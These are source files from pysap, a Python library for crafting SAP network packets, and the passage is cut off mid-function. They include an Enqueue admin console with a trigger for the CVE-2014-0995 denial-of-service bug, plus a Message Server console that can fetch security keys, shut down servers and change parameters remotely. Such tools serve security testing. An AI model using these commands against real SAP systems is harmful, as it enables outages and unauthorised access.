#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.utils import BaseConsole
from pysap.SAPNI import SAPNI
from pysap.SAPEnqueue import (SAPEnqueue, SAPEnqueueParam, enqueue_param_values,
                              SAPEnqueueStreamSocket, SAPEnqueueTracePattern)


# Bind SAP NI with Enqueue packets
bind_layers(SAPNI, SAPEnqueue, )

# Set the verbosity to 0
conf.verb = 0


class SAPEnqueueAdminConsole(BaseConsole):

    intro = "SAP Enqueue Server Admin Console"
    connection = None
    connected = False

    def __init__(self, options):
        super(SAPEnqueueAdminConsole, self).__init__(options)
        self.runtimeoptions["client_name"] = self.options.client
        self.runtimeoptions["client_recv_length"] = 1000
        self.runtimeoptions["client_send_length"] = 1000
        self.runtimeoptions["client_version"] = 3

    # Initialization
    def preloop(self):
        super(SAPEnqueueAdminConsole, self).preloop()
        self.do_connect(None)

    # SAP Enqueue Admin commands

    def do_connect(self, args):
        """Initiate the connection to the Enqueue Server."""

        # Create the socket connection
        try:
            self.connection = SAPEnqueueStreamSocket.get_nisocket(self.options.remote_host,
                                                                  self.options.remote_port)
        except SocketError as e:
            self._error("Error connecting with the Enqueue Server")
            self._error(str(e))
            return

        self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port))

        params = [SAPEnqueueParam(param=0, value=int(self.runtimeoptions["client_recv_length"])),
                  SAPEnqueueParam(param=1, value=int(self.runtimeoptions["client_send_length"])),
                  SAPEnqueueParam(param=3, set_name=self.runtimeoptions["client_name"]),
                  SAPEnqueueParam(param=2, value=59),
                  SAPEnqueueParam(param=5, value=int(self.runtimeoptions["client_version"])),
                  SAPEnqueueParam(param=6, value=1, len=4)
                  ]
        # Send Parameter Request packet
        p = SAPEnqueue(dest=6, opcode=1, params=params)

        self._debug("Retrieving parameters")
        response = self.connection.sr(p)[SAPEnqueue]

        # Walk over the server's parameters
        for param in response.params:
            self._debug("Server parameter: %s=%s" % (enqueue_param_values[param.param],
                                                     param.value if param.param not in [0x03] else param.set_name))
            # Save server version and name as runtime options
            if param.param == 0x03:
                self.runtimeoptions["server_name"] = param.set_name
            if param.param == 0x05:
                self.runtimeoptions["server_version"] = param.value

        self._print("Server name: %s" % self.runtimeoptions["server_name"])
        self._print("Server version: %d" % self.runtimeoptions["server_version"])
        self.connected = True

    def do_disconnect(self, args):
        """Disconnects from the Enqueue Server service. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        self.connection.close()
        self._print("Dettached from %s / %d ..." % (self.options.remote_host, self.options.remote_port))
        self.connected = False

    def do_exit(self, args):
        if self.connected:
            self.do_disconnect(None)
        return super(SAPEnqueueAdminConsole, self).do_exit(args)

    def do_dummy_request(self, args):
        """Send a dummy request to the server to check if it is alive. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send Dummy Request
        p = SAPEnqueue(dest=3, adm_opcode=1)

        self._debug("Sending dummy request")
        response = self.connection.sr(p)[SAPEnqueue]
        response.show()
        self._debug("Performed dummy request")

    def do_get_replication_info(self, args):
        """Get information about the status and statistics of the replication."""

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send Get Replication Info
        p = SAPEnqueue(dest=3, adm_opcode=4)

        self._debug("Sending get replication info request")
        response = self.connection.sr(p)[SAPEnqueue]
        response.show()
        self._debug("Obtained replication info")

    def do_check_pattern_loop_dos(self, args):
        """Tests if the server is vulnerable to an endless loop when a trace
        pattern with a wildcard is set (CVE-2014-0995)."""

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send Set trace patterns Info
        patterns = [SAPEnqueueTracePattern(pattern="*", len=1)]
        p = SAPEnqueue(dest=3, adm_opcode=6, adm_trace_level=3,
                       adm_trace_action=4, adm_trace_logging=1,
                       adm_trace_nopatterns=1,
                       adm_trace_nopatterns1=1,
                       adm_trace_patterns=patterns)

        self._debug("Sending trace pattern with wildcards")
        self.connection.send(p)
        self._debug("Trace pattern set")

        p = SAPEnqueue(dest=3, adm_opcode=1)
        try:
            self.connection.sr(p)[SAPEnqueue]
            self._print("Server available, probably not vulnerable to CVE-2014-0995")
        except:
            self._print("Server unavailable, probably vulnerable to CVE-2014-0995.")


# Command line options parser
def parse_options():

    description = \
    """This script is an example implementation of SAP's Enqueue Server Monitor
    program (ens_mon). It allows the monitoring of a Enqueue Server service and
    allows sending different admin commands and opcodes. Includes some commands
    not available on the ensmon program.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3200)
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-monitor", help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--log-file", dest="logfile", help="Log file")
    misc.add_option("--console-log", dest="consolelog", help="Console log file")
    misc.add_option("--script", dest="script", help="Script file to run")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    en_console = SAPEnqueueAdminConsole(options)

    try:
        if options.script:
            en_console.do_script(options.script)
        else:
            en_console.cmdloop()
    except KeyboardInterrupt:
        print("Cancelled by the user !")
        en_console.do_exit(None)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.utils import BaseConsole
from pysap.SAPMS import (SAPMS, ms_client_status_values, ms_opcode_error_values,
                         ms_dump_command_values, SAPMSCounter, ms_opcode_values,
                         ms_errorno_values, SAPMSProperty, ms_property_id_values,
                         SAPMSAdmRecord)
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


class SAPMSMonitorConsole(BaseConsole):

    intro = "SAP MS Monitor Console"
    connection = None
    connected = False
    clients = []

    def __init__(self, options):
        super(SAPMSMonitorConsole, self).__init__(options)
        self.runtimeoptions["client_string"] = self.options.client

    # Initialization
    def preloop(self):
        super(SAPMSMonitorConsole, self).preloop()
        self.do_connect(None)
        self.do_client_list(None)

    # Helper for crafting packets
    def _build(self, flag, iflag, **args):
        return SAPMS(flag=flag, iflag=iflag,
                     toname=self.runtimeoptions["server_string"],
                     fromname=self.runtimeoptions["client_string"],
                     **args)

    # Helper for sending simple commands and opcodes
    def _send_simple(self, flag, iflag, **args):
        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        if "opcode" in args:
            opcode_name = ms_opcode_values[args["opcode"]] + " "
        else:
            opcode_name = ""

        p = self._build(flag, iflag, **args)

        self._debug("Sending %spacket" % opcode_name)
        response = self.connection.sr(p)[SAPMS]

        if response.opcode_error != 0:
            self._print("Error: %s" % ms_opcode_error_values[response.opcode_error])
            return None
        else:
            return response

    # SAP MS Monitor commands

    def do_connect(self, args):
        """ Initiate the connection to the Message Server service. The
        connection is registered using the client_string runtime option. """

        # Create the socket connection
        try:
            self.connection = SAPRoutedStreamSocket.get_nisocket(self.options.remote_host,
                                                                 self.options.remote_port,
                                                                 self.options.route_string,
                                                                 base_cls=SAPMS)
        except SocketError as e:
            self._error("Error connecting with the Message Server")
            self._error(str(e))
            return

        self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port))

        # Send MS_LOGIN_2 packet
        p = SAPMS(flag=0x00, iflag=0x08, toname=self.runtimeoptions["client_string"], fromname=self.runtimeoptions["client_string"])

        self._debug("Sending login packet")
        response = self.connection.sr(p)[SAPMS]

        if response.errorno == 0:
            self.runtimeoptions["server_string"] = response.fromname
            self._debug("Login performed, server string: %s" % response.fromname)
            self._print("pysap's Message Server monitor, connected to %s / %d" % (self.options.remote_host, self.options.remote_port))
            self.connected = True
        else:
            if response.errorno in ms_errorno_values:
                self._error("Error performing login: %s" % ms_errorno_values[response.errorno])
            else:
                self._error("Unknown error performing login: %d" % response.errorno)

    def do_disconnect(self, args):
        """ Disconnects from the Message Server service. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send MS_LOGOUT packet
        p = self._build(0x00, 0x04)
        self._debug("Sending logout packet")
        self.connection.send(p)

        self.connection.close()
        self._print("Dettached from %s / %d ..." % (self.options.remote_host, self.options.remote_port))

        self.connected = False

    def do_exit(self, args):
        if self.connected:
            self.do_disconnect(None)
        return super(SAPMSMonitorConsole, self).do_exit(args)

    def do_client_list(self, args):
        """ Retrieve the list of clients connected to the Message Server
        service. Use the client # value when required to provide a client
        IDs as parameter. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send MS_SERVER_LONG_LIST packet
        p = self._build(0x01, 0x01, opcode=0x40, opcode_charset=0x00)
        self._debug("Sending server long list packet")
        self.connection.send(p)

        # Send MS_SERVER_LST packet
        response = self._send_simple(0x02, 0x01, opcode=0x05, opcode_version=0x68)

        # Print clients table
        table = [["#", "Client Name", "Host", "Service", "IPv4", "IPv6", "ServNo", "State", "Services"]]
        instance = self.runtimeoptions["server_string"]
        i = 0
        for client in response.clients:
            if client.status == 1:
                instance = client.client
            table.append([str(i),
                          client.client,
                          client.host,
                          client.service,
                          client.hostaddrv4,
                          client.hostaddrv6 if "hostaddrv6" in client.fields else None,
                          str(client.servno),
                          ms_client_status_values[client.status]])
            i += 1
        self._tabulate(table)

        # Store clients for further use
        self.clients = response.clients

        self._debug("Server instance: %s" % instance)
        self.runtimeoptions["instance"] = instance

    def do_hardware_id(self, args):
        """ Retrieve the installation's hardware ID. """
        response = self._send_simple(0x02, 0x01, opcode=0x0a)
        if response:
            self._print("Hardware ID: %s" % response.hwid)

    def do_get_security_by_name(self, args):
        """ Get Security Key by name. """
        response = self._send_simple(0x02, 0x01, opcode=0x08, security_name=args)
        if response:
            self._print("Security Name: %s" % response.security_name)
            self._print("Security Key: %s" % response.security_key)

    def do_get_security_by_ip(self, args):
        """ Get Security Key by ip/port. Options <IPv4 address> <port> """

        try:
            ip, port = args.split(" ")
            port = int(port)
        except ValueError:
            self._error("Wrong parameters !")
            return

        # Send MS_GET_SECURITY
        response = self._send_simple(0x02, 0x01, opcode=0x09, security2_addressv4=ip, security2_port=port)
        if response:
            self._print("Security IPv4 Address: %s" % response.security2_addressv4)
            self._print("Security Port: %s" % response.security2_port)
            self._print("Security Key: %s" % response.security2_key)
            self._print("Security IPv6 Address: %s" % response.security2_addressv6)

    def do_dump(self, args):
        """ Dump information. Options [<dump command> | all] """

        if args == "all":
            for key in ms_dump_command_values:
                self.do_dump(key)
            return

        # Split list of commands
        try:
            args = args.split(" ")
        except AttributeError:
            args = [args]

        try:
            command = int(args[0])
        except ValueError:
            self._error("Wrong dump command ! Valid values:")
            for key in ms_dump_command_values:
                self._error("%d: %s" % (key, ms_dump_command_values[key]))
            self._error("all: dumps all the available information")
            return

        if command == 1:  # MS_DUMP_MSADM
            try:
                client_id = int(args[1])
                client = self.clients[client_id]
            except (ValueError, KeyError, IndexError):
                self._error("Wrong parameters ! Specify client ID")
                return
            response = self._send_simple(0x02, 0x01, opcode=0x1e,
                                         dump_dest=0x02, dump_command=command,
                                         dump_name=client.client)
        elif command == 12:  # MS_DUMP_COUNTER
            try:
                counter = args[1]
            except IndexError:
                self._error("Wrong parameters ! Specify counter number")
                return
            response = self._send_simple(0x02, 0x01, opcode=0x1e,
                                         dump_dest=0x02, dump_command=command,
                                         dump_name=counter)
        else:
            # Send MS_DUMP_INFO
            response = self._send_simple(0x02, 0x01, opcode=0x1e, dump_dest=0x02, dump_command=command)

        if response:
            self._print("Dump information:\n%s" % response.opcode_value)

    def do_server_parameters(self, args):
        """ Dump server parameters. """
        self.do_dump("3")

    def do_server_release(self, args):
        """ Dump release information. """
        self.do_dump("8")

    def do_trace_increase(self, args):
        """ Increase server's trace level. """

        # Send MS_INCRE_TRACE
        response = self._send_simple(0x02, 0x01, opcode=0x0b)
        if response:
            self._print("Trace increased")

    def do_trace_decrease(self, args):
        """ Decrease server's trace level. """

        # Send MS_DECRE_TRACE
        response = self._send_simple(0x02, 0x01, opcode=0x0c)
        if response:
            self._print("Trace decreased")

    def do_trace_reset(self, args):
        """ Reset server's trace level. """

        # Send MS_RESET_TRACE
        response = self._send_simple(0x02, 0x01, opcode=0x0d)
        if response:
            self._print("Trace reset")

    def do_statistics_activate(self, args):
        """ Activates server's statistics. """

        # Send MS_ACT_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x0e)
        if response:
            self._print("Statistics activated")

    def do_statistics_deactivate(self, args):
        """ Deactivates server's statistics. """

        # Send MS_DEACT_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x0f)
        if response:
            self._print("Statistics deactivated")

    def do_statistics_reset(self, args):
        """ Reset server's statistics. """

        # Send MS_RESET_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x10)
        if response:
            self._print("Statistics reset")

    def do_statistics_get(self, args):
        """ Get server's statistics. """

        # Send MS_GET_STATISTIC
        response = self._send_simple(0x02, 0x01, opcode=0x11)
        # TODO: Statistics fields are not correctly defined, just showing the
        # complete packet now
        if response:
            response.show()

    def do_network_buffer_dump(self, args):
        """ Dump network buffer. """

        # Send MS_DUMP_NIBUFFER
        response = self._send_simple(0x02, 0x01, opcode=0x12)
        if response:
            self._print("Network buffer dumped")

    def do_network_buffer_reset(self, args):
        """ Reset network buffer. """

        # Send MS_RESET_NIBUFFER
        response = self._send_simple(0x02, 0x01, opcode=0x13)
        if response:
            self._print("Network buffer reset")

    def do_get_codepage(self, args):
        """ Get code page. """

        # Send MS_GET_CODEPAGE
        response = self._send_simple(0x02, 0x01, opcode=0x1c)
        if response:
            self._print("Codepage: %s" % response.codepage)

    def do_counter_list(self, args):
        """ List Counters. """

        # Send MS_COUNTER_LST
        response = self._send_simple(0x02, 0x01, opcode=0x2a)
        if response:
            self._print("Counters:\n%s" % response.counters)

    def _counter_opcodes(self, counter, opcode, count=0, number=0):
        """ Helper for counter commands. """

        c = SAPMSCounter(uuid=counter, count=count, no=number)
        response = self._send_simple(0x02, 0x01, opcode=opcode, counter=c)
        if response and response.counter:
            self._print("Counter UUID: %s Count: %d No: %d" % (response.counter.uuid,
                                                               response.counter.count,
                                                               response.counter.no))

    def do_counter_get(self, args):
        """ Get Counter. Options: <counter> """
        self._counter_opcodes(args, 0x29)

    def do_counter_create(self, args):
        """ Create Counter. Options: <counter> """
        self._counter_opcodes(args, 0x24)

    def do_counter_delete(self, args):
        """ Delete Counter. Options: <counter> """
        self._counter_opcodes(args, 0x25)

    def do_counter_increment(self, args):
        """ Increment Counter. Options: <counter> <value> """
        try:
            counter, count = args.split(" ")
            count = int(count)
        except ValueError:
            self._error("Invalid parameters !")
            return

        self._counter_opcodes(counter, 0x26, count=count)

    def do_counter_decrement(self, args):
        """ Decrement Counter. Options: <counter> <value> """
        try:
            counter, count = args.split(" ")
            count = int(count)
        except ValueError:
            self._error("Invalid parameters !")
            return

        self._counter_opcodes(counter, 0x27, count=count)

    def do_counter_register(self, args):
        """ Register Counter. Options: <counter> """
        self._counter_opcodes(args, 0x28)

    def do_server_disconnect(self, args):
        """ Server disconnect. Options: <client id> <reason> """

        try:
            client_id, reason = args.split(" ", 2)
            client_id = int(client_id)
            client = self.clients[client_id]
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            self.do_client_list(None)
            return

        # Send MS_SERVER_DISC packet
        response = self._send_simple(0x02, 0x01, opcode=0x2e,
                                     shutdown_client=client,
                                     shutdown_reason=reason)
        if response:
            self._print("Disconnected from server")

    def do_server_shutdown(self, args):
        """ Server shutdown. Options: <client id> <reason> """

        try:
            client_id, reason = args.split(" ", 2)
            client_id = int(client_id)
            client = self.clients[client_id]
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            self.do_client_list(None)
            return

        # Send MS_SERVER_SHUTDOWN packet
        response = self._send_simple(0x02, 0x01, opcode=0x2f,
                                     shutdown_client=client,
                                     shutdown_reason=reason)
        if response:
            self._print("Server shutdown")

    def do_server_soft_shutdown(self, args):
        """ Server soft shutdown. Options: <client id> <reason> """

        try:
            client_id, reason = args.split(" ", 2)
            client_id = int(client_id)
            client = self.clients[client_id]
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            self.do_client_list(None)
            return

        # Send MS_SERVER_SOFT_SHUTDOWN packet
        response = self._send_simple(0x02, 0x01, opcode=0x30,
                                     shutdown_client=client,
                                     shutdown_reason=reason)
        if response:
            self._print("Server soft shutdown")

    def do_property_get(self, args):
        """ Get property. Options: <client id> <prop id> """

        try:
            prop_client, prop_id = args.split(" ")
            prop_client = self.clients[int(prop_client)]
            prop_id = int(prop_id)
        except (ValueError, KeyError):
            self._error("Invalid parameters !")
            return

        # Send MS_GET_PROPERTY packet
        prop = SAPMSProperty(client=prop_client.client,
                             id=prop_id)
        response = self._send_simple(0x02, 0x01, opcode=0x44,
                                     property=prop)
        if response:
            self._print("Property %s for client %s:" % (ms_property_id_values[prop_id],
                                                        prop_client.client.strip()))
            response.property.show()

    def do_parameter_get(self, args):
        """ Get parameter value. Options: <parameter name> """

        parameter_name = args

        # Send ADM AD_PROFILE request
        adm = SAPMSAdmRecord(opcode=0x1, parameter=parameter_name)
        p = self._build(0x04, 0x05, adm_records=[adm])

        response = self.connection.sr(p)[SAPMS]

        if response:
            self._print("Parameter value: %s" % (response.adm_records[0].parameter))

    def do_parameter_set(self, args):
        """ Set parameter value (requires monitor mode enabled).
            Options: <parameter name> <parameter value> """

        try:
            parameter_name, parameter_value = args.split(" ", 2)
        except ValueError:
            self._error("Invalid parameters !")
            return

        # Send ADM AD_SHARED_PARAMETER request
        adm = SAPMSAdmRecord(opcode=0x2e,
                             parameter="%s=%s" % (parameter_name,
                                                  parameter_value))
        p = self._build(0x04, 0x05, adm_records=[adm])

        response = self.connection.sr(p)[SAPMS]

        if response:
            if response.adm_records[0].errorno != 0:
                self._error("Error changing the parameter !")
            else:
                self._print("Parameter %s set to %s !" % (parameter_name,
                                                          parameter_value))


# Command line options parser
def parse_options():

    description = \
    """This script is an example implementation of SAP's Message Server Monitor
    program (msmon). It allows the monitoring of a Message Server service and
    allows sending different commands and opcodes. Includes some commands not
    available on the msmon program. Some commands requires the server running
    in monitor mode, the most requires access to the Message Server internal
    port.

    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3900)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-monitor", help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--log-file", dest="logfile", help="Log file")
    misc.add_option("--console-log", dest="consolelog", help="Console log file")
    misc.add_option("--script", dest="script", help="Script file to run")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    ms_console = SAPMSMonitorConsole(options)

    try:
        if options.script:
            ms_console.do_script(options.script)
        else:
            ms_console.cmdloop()
    except KeyboardInterrupt:
        print("Cancelled by the user !")
        ms_console.do_exit(None)


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from binascii import unhexlify
from os.path import join as join, dirname


def read_data_file(filename, unhex=True):
    filename = join(dirname(__file__), 'data', filename)
    with open(filename, 'r') as f:
        data = f.read()

    data = data.replace('\n', ' ').replace(' ', '')
    if unhex:
        data = unhexlify(data)

    return data



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from collections import defaultdict
from optparse import OptionParser, OptionGroup
# External imports
import wx  # TODO: Change wx to Tkinter
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI
from pysap.SAPDiagItems import *
from pysap.SAPDiag import SAPDiag, SAPDiagDP
from pysap.SAPDiagClient import SAPDiagConnection


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script renders the login screen provided by an SAP
    Netweaver Application Server using wx.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3200)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--terminal", dest="terminal", default=None, help="Terminal name")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


class DiagScreen(wx.Frame):
    def __init__(self, parent, windows_title, height, width, session_title, dbname, cpuname):
        wx.Frame.__init__(self, parent, title=windows_title)

        self.maincontainer = wx.BoxSizer(wx.VERTICAL)

        self.session_title = wx.StaticBox(self, label=session_title)

        self.container = wx.StaticBoxSizer(self.session_title, wx.VERTICAL)
        self.maincontainer.Add(self.container, flag=wx.EXPAND | wx.ALL, border=10)

        self.buttonbar = wx.ToolBar(self)
        self.container.Add(self.buttonbar, flag=wx.EXPAND | wx.ALL, border=10)

        self.content = wx.GridBagSizer()
        self.container.Add(self.content)
        self.SetSizer(self.container)

        self.menubar = wx.MenuBar()
        self.SetMenuBar(self.menubar)

        self.toolbar = self.CreateToolBar()
        self.toolbar.Realize()

        self.statusbar = self.CreateStatusBar()
        self.statusbar.SetFields(["", dbname, cpuname])

        self.menus = defaultdict(defaultdict)

    def add_text(self, x, y, maxlength, text, tooltip=None):
        text_control = wx.StaticText(self, label=text)
        if tooltip:
            text_control.SetTooltip(tooltip)
        self.content.Add(text_control, pos=(y, x), flag=wx.TOP | wx.LEFT | wx.BOTTOM, border=5)

    def add_text_box(self, x, y, maxlength, text, invisible=0):
        if invisible:
            textbox_control = wx.TextCtrl(self, style=wx.TE_PASSWORD)
        else:
            textbox_control = wx.TextCtrl(self)
        textbox_control.SetMaxLength(maxlength)
        textbox_control.SetValue(text)
        self.content.Add(textbox_control, pos=(y, x), flag=wx.TOP | wx.LEFT | wx.BOTTOM, border=5)

    def add_button(self, text):
        button = wx.Button(self.buttonbar, wx.ID_ANY, text)
        self.buttonbar.AddControl(button)

    def add_toolbar(self, text):
        toolbar = wx.Button(self.toolbar, wx.ID_ANY, text)
        self.toolbar.AddControl(toolbar)

    def add_menu(self, pos1, text):
        self.menus[pos1][0] = wx.Menu()
        self.menubar.Append(self.menus[pos1][0], text)

    def add_child_menu(self, text, pos1, pos2=0, pos3=0, pos4=0, sel=0, men=0, sep=0):
        # XXX: Support menus of level 4, need to use another structure for storing the menus and their handles
        if pos4 > 0:
            return
        if sep:
            self.menus[pos1][0].AppendSeparator()
        else:
            if men:
                self.menus[pos1][pos2] = wx.Menu()
                item = self.menus[pos1][0].AppendMenu(wx.ID_ANY, text, self.menus[pos1][pos2])
            else:
                if pos3 > 0:
                    item = self.menus[pos1][pos2].Append(wx.ID_ANY, text)
                else:
                    item = self.menus[pos1][0].Append(wx.ID_ANY, text)
            item.Enable(sel == 1)


def render_diag_screen(screen, verbose):
    """
    Renders the Dynt Atom items of a message

    """

    def get_item_value(screen, item_type, item_id, item_sid, i=0):
        item = screen.get_item(item_type, item_id, item_sid)
        if (len(item) > 0):
            return item[i].item_value
        else:
            return []

    areasize = get_item_value(screen, "APPL", "VARINFO", "AREASIZE")
    dbname = get_item_value(screen, "APPL", "ST_R3INFO", "DBNAME")
    cpuname = get_item_value(screen, "APPL", "ST_R3INFO", "CPUNAME")
    client = get_item_value(screen, "APPL", "ST_R3INFO", "CLIENT")
    session_icon = get_item_value(screen, "APPL", "VARINFO", "SESSION_ICON")
    session_title = get_item_value(screen, "APPL", "VARINFO", "SESSION_TITLE")
    menus = get_item_value(screen, "APPL4", "MNUENTRY", "MENU_ACT")
    menudetails = get_item_value(screen, "APPL4", "MNUENTRY", "MENU_MNU")
    buttonbars = get_item_value(screen, "APPL4", "MNUENTRY", "MENU_PFK")
    toolbars = get_item_value(screen, "APPL4", "MNUENTRY", "MENU_KYB")

    if verbose:
        print "[*] DB Name:", dbname
        print "[*] CPU Name:", cpuname
        print "[*] Client:", client
        print "[*] Session Icon:", session_icon
        print "[*] Session Title:", session_title
        print "[*] Window Size:", areasize.window_height, "x", areasize.window_width

    app = wx.App(False)
    login_frame = DiagScreen(None, "%s (%s)" % (session_icon, client), areasize.window_height, areasize.window_width, session_title, dbname, cpuname)

    # Render the atoms (control boxes and labels)
    atoms = screen.get_item(["APPL", "APPL4"], "DYNT", "DYNT_ATOM")
    if atoms and len(atoms) > 0:
        for atom_item in [atom for atom_item in atoms for atom in atom_item.item_value.items]:
            if atom_item.etype in [121, 123]:
                text = atom_item.field1_text
                maxnrchars = atom_item.field1_maxnrchars
            elif atom_item.etype in [130, 132]:
                text = atom_item.field2_text
                maxnrchars = atom_item.field2_maxnrchars
            else:
                text = None
                maxnrchars = 0

            if text is not None:
                if atom_item.etype in [123, 132]:  # DIAG_DGOTYP_KEYWORD_1 or DIAG_DGOTYP_KEYWORD_2
                    if text.find("@\Q") >= 0:
                        tooltip = text.split("@")[1][2:]
                        text = text.split("@")[2]
                    else:
                        tooltip = None
                    if verbose:
                        print "[*] Found text label at %d,%d: \"%s\" (maxlength=%d) (tooltip=\"%s\")" % (atom_item.col, atom_item.row, text.strip(), maxnrchars, tooltip)
                    login_frame.add_text(atom_item.col, atom_item.row, maxnrchars, text)
                elif atom_item.etype in [121, 130]:  # DIAG_DGOTYP_EFIELD_1 or DIAG_DGOTYP_EFIELD_2
                    if verbose:
                        print "[*] Found text box at %d,%d: \"%s\" (maxlength=%d)" % (atom_item.col, atom_item.row, text.strip(), maxnrchars)
                    login_frame.add_text_box(atom_item.col, atom_item.row, maxnrchars, text.strip(), atom_item.attr_DIAG_BSD_INVISIBLE == 1)
            else:
                print "[*] Found label without text"

    # Render the menus
    if len(menus) > 0:
        for menu in menus.entries:
            if verbose:
                print "[*] Found menu item: \"%s\"" % menu.text
            login_frame.add_menu(menu.position_1, menu.text)

        # Render the submenus
        if len(menudetails) > 0:
